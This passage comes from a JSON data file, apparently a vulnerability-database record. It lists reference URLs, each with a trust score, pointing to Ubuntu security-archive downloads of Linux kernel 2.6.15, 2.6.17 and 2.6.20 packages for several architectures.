        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-server-bigiron_2.6.15-29.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-386_2.6.15-29.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-server-bigiron_2.6.15-29.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-sparc64-smp_2.6.15-29.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.32_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-xeon_2.6.15-29.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
